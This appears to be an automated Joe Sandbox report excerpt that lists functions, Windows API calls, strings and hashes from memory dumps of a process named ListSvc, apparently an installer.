Part of subcall function 0040DE30: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,0040DEF1), ref: 0040DE64

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: Thread$LanguagesPreferred$Language
String ID:
API String ID: 2255706666-0
Opcode ID: 7b6831f497646e761f52de9c536b6e12a9bbcbfaf2b29159977432e5b56d760a
Instruction ID: 69b1dabfcf83cd92044bbbe7d095353c7cd2b80021ffbfb9d1b785f1729ac455
Opcode Fuzzy Hash: 7b6831f497646e761f52de9c536b6e12a9bbcbfaf2b29159977432e5b56d760a
Instruction Fuzzy Hash: 63317070E1021A9BCB10DFE9D884AAEB7B5FF14305F40417AE516FB2D1D7789A09CB94

Uniqueness

Uniqueness Score: -1.00%

Function 005CE374, Relevance: 6.1, APIs: 4, Instructions: 60COMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(?,0068D5D0,?), ref: 005CE38D
MulDiv.KERNEL32(?,005CE4BF,0068D5D0), ref: 005CE3A0
MulDiv.KERNEL32(?,0068D5D0,?), ref: 005CE3B7
MulDiv.KERNEL32(?,005CE4BF,0068D5D0), ref: 005CE3D5

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac23038dacf6796b57d110ed30358184083c47a134689276074c101833fe842e
Instruction ID: 3e71b6adc286f200af4aaafaaf3a8fca573aba72415269075ac824ff0f327e96
Opcode Fuzzy Hash: ac23038dacf6796b57d110ed30358184083c47a134689276074c101833fe842e
Instruction Fuzzy Hash: B9113072A04244AFCB44DEDDD8C5E9F7BEDEF48364B144499F908DB242C678ED808BA4

Uniqueness

Uniqueness Score: -1.00%

Function 004F53AC, Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON

Download Yara Rule

APIs

GetIconInfo.USER32(00000000,00000000), ref: 004F53CD
GetObjectW.GDI32(0068D5D0,00000018,00000000,00000000,004F5429,?,004C0068), ref: 004F53EE
DeleteObject.GDI32(?), ref: 004F541A
DeleteObject.GDI32(0068D5D0), ref: 004F5423

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: Object$Delete$IconInfo
String ID:
API String ID: 507670407-0
Opcode ID: 939d8cbd648baad16ebc5502745bc899ef72b4fd7c693fad9428492138ac7e12
Instruction ID: 4322d414b200eb17045e09ec041732102b9da4c87ad94fc4c4d540c0fc3291bf
Opcode Fuzzy Hash: 939d8cbd648baad16ebc5502745bc899ef72b4fd7c693fad9428492138ac7e12
Instruction Fuzzy Hash: 2B11A375A00608AFCB04DFA6D981DAEB7F9EF88314B5081AAFE04D3351DB38DE408B54

Uniqueness

Uniqueness Score: -1.00%

Function 005B9590, Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 005B95A3
GetWindowLongW.USER32(?,000000EC), ref: 005B95E5
SetWindowLongW.USER32 ref: 005B95FF
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,C31852FF,?,00000000,?,005B96B9,?,?,?,00000000), ref: 005B9627

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: Window$Long$Visible
String ID:
API String ID: 2967648141-0
Opcode ID: c53b897a5a1d9d2e71e6f85843be0105534f78b66b69f438aa9e828b25e0526c
Instruction ID: de5a40ccb5800a4cef2b87037ee72a09c9fd5293aebedbf233be07227e7c069f
Opcode Fuzzy Hash: c53b897a5a1d9d2e71e6f85843be0105534f78b66b69f438aa9e828b25e0526c
Instruction Fuzzy Hash: B31161742851446FDB00DB28D888FFA7FE9AB45324F458191F988CB362CA38ED80CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0046A218, Relevance: 6.1, APIs: 4, Instructions: 51COMMON

Download Yara Rule

APIs

FindResourceW.KERNEL32(?,?,?,00444A50,?,00000001,00000000,?,0046A15A,00000000,00000000,?,006D579C,?,?,006AC890), ref: 0046A22F
LoadResource.KERNEL32(?,0046A2B4,?,?,?,00444A50,?,00000001,00000000,?,0046A15A,00000000,00000000,?,006D579C,?), ref: 0046A249
SizeofResource.KERNEL32(?,0046A2B4,?,0046A2B4,?,?,?,00444A50,?,00000001,00000000,?,0046A15A,00000000,00000000), ref: 0046A263
LockResource.KERNEL32(00469B00,00000000,?,0046A2B4,?,0046A2B4,?,?,?,00444A50,?,00000001,00000000,?,0046A15A,00000000), ref: 0046A26D

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: Resource$FindLoadLockSizeof
String ID:
API String ID: 3473537107-0
Opcode ID: c0a3742649e4821bf1d8e39dd4131d6b260b263a11f53cd498264533ba18d33a
Instruction ID: abb9b97bb193dfeb05d9d82a7f41705a61c143c3b7d9841fcbe573c2d8062a85
Opcode Fuzzy Hash: c0a3742649e4821bf1d8e39dd4131d6b260b263a11f53cd498264533ba18d33a
Instruction Fuzzy Hash: C4F081B36406046F5745EE9DA881DAB77ECEE89364310015FF908D7302EA39DD51477A

Uniqueness

Uniqueness Score: -1.00%

Function 00610040, Relevance: 6.0, APIs: 4, Instructions: 48registrywindowCOMMON

Download Yara Rule

APIs

RegDeleteValueW.ADVAPI32(?,00000000,?,00000002,00000000,?,?,?,?,0062AC8F), ref: 0061008A
RegCloseKey.ADVAPI32(00000000,?,00000000,?,00000002,00000000,?,?,?,?,0062AC8F), ref: 00610093
RemoveFontResourceW.GDI32(00000000), ref: 006100A0
SendNotifyMessageW.USER32(0000FFFF,0000001D,00000000,00000000), ref: 006100B4

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: CloseDeleteFontMessageNotifyRemoveResourceSendValue
String ID:
API String ID: 261542597-0
Opcode ID: 77a4b43a7585b641cb4056c657f18fe2b74d7f9113a8b954b3ed7bedb6d61676
Instruction ID: 1dce9f2b70afa6587215b720e4c7b57155893329b24cac9d33cbe1fd09ddcff8
Opcode Fuzzy Hash: 77a4b43a7585b641cb4056c657f18fe2b74d7f9113a8b954b3ed7bedb6d61676
Instruction Fuzzy Hash: B2F0C87674430567EA20B6B65C4BFEF128E8FC9745F24492EBA04EB282D668DC814369

Uniqueness

Uniqueness Score: -1.00%

Function 0050E958, Relevance: 6.0, APIs: 4, Instructions: 35threadCOMMON

Download Yara Rule

APIs

GetWindowThreadProcessId.USER32(00000000), ref: 0050E965
GetCurrentProcessId.KERNEL32(?,00000000,00000000,005BA39A,?,?,00000000,00000001,005B8697,?,00000000,00000000,00000000,00000001,?,00000000), ref: 0050E96E
GlobalFindAtomW.KERNEL32(00000000), ref: 0050E983
GetPropW.USER32 ref: 0050E99A

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: Process$AtomCurrentFindGlobalPropThreadWindow
String ID:
API String ID: 2582817389-0
Opcode ID: 96014bfda2539c3c724341726d25520330f77261c7fcf234c4c7e102e9717c52
Instruction ID: 299b27e64c01e87a133ce8a54c99347aef86e5c58dac0e1e1101b5cceb09c5b5
Opcode Fuzzy Hash: 96014bfda2539c3c724341726d25520330f77261c7fcf234c4c7e102e9717c52
Instruction Fuzzy Hash: 09F0ECA160511166CB60BBB65C8787F5A8C9FC43907751D2BF841DA192D514CC8142FE

Uniqueness

Uniqueness Score: -1.00%

Function 006A5D88, Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000008), ref: 006A5D91
OpenProcessToken.ADVAPI32(00000000,00000008), ref: 006A5D97
GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008), ref: 006A5DB9
CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008), ref: 006A5DCA

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: ProcessToken$CloseCurrentHandleInformationOpen
String ID:
API String ID: 215268677-0
Opcode ID: afea7f4269af62d161ed65023b08510fb3f5f5d3f19be2d10221e2fcac776304
Instruction ID: 606920211f29873d44d72264013709cf63daaae85b794eef22724c21b877f5a5
Opcode Fuzzy Hash: afea7f4269af62d161ed65023b08510fb3f5f5d3f19be2d10221e2fcac776304
Instruction Fuzzy Hash: 30F030716043017BD700EAB58D82EDB77DCAF45715F00482DBA98C7281DA38ED489766

Uniqueness

Uniqueness Score: -1.00%

Function 004F5548, Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 004F5551
SelectObject.GDI32(00000000,058A00B4), ref: 004F5563
GetTextMetricsW.GDI32(00000000,?,00000000,058A00B4,00000000), ref: 004F556E
ReleaseDC.USER32 ref: 004F557F

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: MetricsObjectReleaseSelectText
String ID:
API String ID: 2013942131-0
Opcode ID: 7f08a457e74fbd3b271c5bbe40b56a30871c5d5dda21d4d00258fc544de77888
Instruction ID: eb0f3ac5e6ff13c2d338f041733c2278b611cd6d279531a3f0c2a93b6799ed89
Opcode Fuzzy Hash: 7f08a457e74fbd3b271c5bbe40b56a30871c5d5dda21d4d00258fc544de77888
Instruction Fuzzy Hash: 64E0DF71E029A432D61071661C82BEF2A498F823AAF08112BFF08992D1DA0CC94083FE

Uniqueness

Uniqueness Score: -1.00%

Function 0060F338, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(0000003C), ref: 0060F3D4
GetLastError.KERNEL32(00000000,0060F41C,?,?,?,00000001), ref: 0060F3E3

Part of subcall function 005C745C: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005C746F

Strings

<, xrefs: 0060F38E

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: DirectoryErrorExecuteLastShellSystem
String ID: <
API String ID: 893404051-4251816714
Opcode ID: e61f532a34ba40f9ed11058ee7bbe23f206fa57e54983470e3e4627e38209dd8
Instruction ID: dcf8102ceadd4487f49ba87b12be971fda6b0883f73445cbcbdd13ac2b4765a0
Opcode Fuzzy Hash: e61f532a34ba40f9ed11058ee7bbe23f206fa57e54983470e3e4627e38209dd8
Instruction Fuzzy Hash: 6C216D70A40209DFDB24EFA5C885ADE7BE9EF58394F50003AF800E7691E77899518B98

Uniqueness

Uniqueness Score: -1.00%

Function 006B72C2, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 006B7302

Strings

/INITPROCWND=$%x , xrefs: 006B7332
@, xrefs: 006B72C8

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: Window
String ID: /INITPROCWND=$%x $@
API String ID: 2353593579-4169826103
Opcode ID: c5684dee33ba9897102623d205b8f12a775b2b56f0b9d91e0f24c978029d6739
Instruction ID: aee196482ecc750f80196a5b85e8ce4b28bd470815894a77b79cec9963f5eee4
Opcode Fuzzy Hash: c5684dee33ba9897102623d205b8f12a775b2b56f0b9d91e0f24c978029d6739
Instruction Fuzzy Hash: 0721C070A083489FDB01EBA4D841FEE77F6EF89304F51447AF800E7291DA38AA45DB54

Uniqueness

Uniqueness Score: -1.00%

Function 00435608, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(FYC), ref: 00435618

Part of subcall function 0040A61C: SysReAllocStringLen.OLEAUT32(00000000,?,?), ref: 0040A636

Strings

FYC, xrefs: 00435614, 00435638, 0043566B, 00435617, 0043563B
kYC, xrefs: 00435656

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: AllocInitStringVariant
String ID: FYC$kYC
API String ID: 4010818693-1629163012
Opcode ID: 3b028a09afde62da82f47710d3d6daef9e5d11d6f2f19900e295b27d7684dbff
Instruction ID: 78d3457c21f8c6ae710edabf1b7f51a26e4fb704544ac86c5ed1d2f79e361521
Opcode Fuzzy Hash: 3b028a09afde62da82f47710d3d6daef9e5d11d6f2f19900e295b27d7684dbff
Instruction Fuzzy Hash: 2FF08171704608AFD700EB95CC52E9EB3F8EB4D700FA04176F604E3690DA346E04C769

Uniqueness

Uniqueness Score: -1.00%

Function 006B8CAC, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

Part of subcall function 006ACE20: FreeLibrary.KERNEL32(00000000,006B8CD8,00000000,006B8CE7,?,?,?,?,?,006B97CB), ref: 006ACE36

Part of subcall function 006ACB10: GetTickCount.KERNEL32 ref: 006ACB58

Part of subcall function 00615560: SendMessageW.USER32(00000000,00000B01,00000000,00000000), ref: 0061557F

GetCurrentProcess.KERNEL32(00000001,?,?,?,?,006B97CB), ref: 006B8D01
TerminateProcess.KERNEL32(00000000,00000001,?,?,?,?,006B97CB), ref: 006B8D07

Strings

Detected restart. Removing temporary directory., xrefs: 006B8CBB

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: Process$CountCurrentFreeLibraryMessageSendTerminateTick
String ID: Detected restart. Removing temporary directory.
API String ID: 1717587489-3199836293
Opcode ID: b875f7f0b48f5dfd19b2ce76acc2faf3568150e367b49ea09eed803ae0a996fc
Instruction ID: 85aea6856e01ecd59818c985a9c9c54c6fb1bec533a363d5825b66760217dfd7
Opcode Fuzzy Hash: b875f7f0b48f5dfd19b2ce76acc2faf3568150e367b49ea09eed803ae0a996fc
Instruction Fuzzy Hash: 38E0E5F16082446EE2417BB9FC13DA67F9FDB86764B51043BF50083542D9295C80C338

Uniqueness

Uniqueness Score: -1.00%

Function 005C8790, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON

Download Yara Rule

APIs

Part of subcall function 005C8820: GetModuleHandleW.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,?,005C879E,?,?,?,006B7DE9,0000000A,00000002,00000001,00000031,00000000,006B8019), ref: 005C882E

GetModuleHandleW.KERNEL32(user32.dll,ShutdownBlockReasonCreate,?,?,?,006B7DE9,0000000A,00000002,00000001,00000031,00000000,006B8019,?,00000000,006B80E6), ref: 005C87A8

Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A

Strings

user32.dll, xrefs: 005C87A3
ShutdownBlockReasonCreate, xrefs: 005C879E

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: HandleModule$AddressProc
String ID: ShutdownBlockReasonCreate$user32.dll
API String ID: 1883125708-2866557904
Opcode ID: 362b9cabf5ac7dba346b645e3f3f1642086c31dc1fbbcb2e577ef78e05f1780f
Instruction ID: 7110eff28424d8e01fad9884693b7150e68d4fec514983f83c6ed3211673b8d3
Opcode Fuzzy Hash: 362b9cabf5ac7dba346b645e3f3f1642086c31dc1fbbcb2e577ef78e05f1780f
Instruction Fuzzy Hash: E7E0C2623402212E020071FF2C85F7F08CCEDC8B6A3300C3EB200D3501EE5ACC0101AC

Uniqueness

Uniqueness Score: -1.00%

